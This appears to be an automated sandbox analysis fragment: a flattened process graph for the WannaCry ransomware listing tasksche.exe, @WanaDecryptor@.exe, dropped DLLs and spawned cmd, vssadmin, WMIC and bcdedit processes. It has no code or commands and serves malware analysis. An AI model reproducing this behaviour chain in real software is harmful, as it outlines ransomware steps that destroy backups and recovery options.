capacity for this level. 7 dropped files have been hidden. d1e545486 libeay32.dll, PE32 d1e545495 libevent-2-0-5.dll, PE32 d1e545504 libevent_core-2-0-5.dll, PE32 0->3860sig 0->d1e544783 0->d1e478394 3 tasksche.exe 3 0->3      started     2->3862sig 2->d1e478453 4->8094reducedSig 4->8094sig 5 tasksche.exe 1 1011 4->5      started     3->d1e76155 dropped 5->725reducedSig 5->725sig 5->915sig 5->5235sig 5->d1e175133reduced dropped 5->d1e175133 dropped 5->d1e175159 dropped 6reduced Processes exeeded maximum capacity for this level. 6 processes have been hidden. 5->6reduced      started     11 cmd.exe 5->11      started     14 @WanaDecryptor@.exe 5->14      started     15 cmd.exe 5->15      started     21 taskse.exe 5->21      started     22 cmd.exe 5->22      started     11->80911reducedSig 11->80911sig 13 cscript.exe 11->13      started     14->7214reducedSig 14->7214sig 14->d1e545486reduced dropped 14->d1e545486 dropped 14->d1e545495 dropped 14->d1e545504 dropped 19 taskhsvc.exe 14->19      started     15->80915reducedSig 15->80915sig 18 @WanaDecryptor@.exe 15->18      started     25 @WanaDecryptor@.exe 21->25      started     22->80922reducedSig 22->80922sig 26 reg.exe 22->26      started     19->77719sig 19->d1e544777reduced 19->d1e544778 19->d1e544780 19->d1e544784 18->7218reducedSig 18->7218sig 27 cmd.exe 18->27      started     25->7225reducedSig 25->7225sig 27->80927reducedSig 27->80927sig 27->53227sig 27->86427sig 29reduced Processes exeeded maximum capacity for this level. 2 processes have been hidden. 27->29reduced      started     29 vssadmin.exe 27->29      started     32 WMIC.exe 27->32      started     33 bcdedit.exe 27->33      started     process0 dnsIp0 signatures0 process3 fileCreated3 signatures3 process6 fileCreated6 signatures6 process13 dnsIp13 signatures13 process27 signatures27 process29 fileCreated0 fileCreated13

Yara Overview

No Yara matches

Screenshot